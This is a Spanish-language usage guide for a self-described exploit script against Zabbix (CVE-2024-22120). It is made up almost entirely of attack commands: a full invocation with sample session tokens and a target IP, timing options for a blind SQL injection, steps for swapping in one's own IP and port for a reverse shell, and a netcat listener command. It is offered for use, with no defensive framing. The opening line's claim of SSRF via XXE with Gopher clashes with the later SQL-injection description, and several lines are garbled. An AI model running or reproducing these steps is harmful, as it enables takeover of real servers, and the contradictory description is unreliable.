
Este es mi exploit para CVE-2024-22120, que implica una vulnerabilidad SSRF dentro de un XXE con un payload Gopher.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Has identificado un servidor Zabbix ejecutándose en la IP 192.168.1.100, y tienes acceso a un usuario con privilegios limitados con los siguientes detalles:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gQuieres explotar la vulnerabilidad RCE usando este script.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: La dirección IP del servidor Zabbix.--sid d82bf6715e1d3c1f25: El ID de sesión de un usuario con privilegios limitados.--hostid 10107: El ID de un host al que el usuario con privilegios limitados puede acceder.--phpsessid a4g7f48d9j3r7h8s9g: El ID de sesión PHP utilizado para autenticar las solicitudes.--false_time 1: Tiempo en segundos para esperar en caso de una suposición incorrecta durante la inyección SQL (por defecto 1 segundo).--true_time 3: Tiempo en segundos para esperar en caso de una suposición correcta durante la inyección SQL (por defecto 3 segundos).10.0.46.27:5555 en el script).Asegúrate de que tu máquina esté escuchando en el puerto especificado (5555 en el script) para recibir el reverse shell. Puedes usar netcat para esto:
nc -lvnp 5555
Reemplaza la IP 10.0.46.27 y el puerto 5555 en la función CreateScript con tu propia IP y puerto deseado para recibir el reverse shell.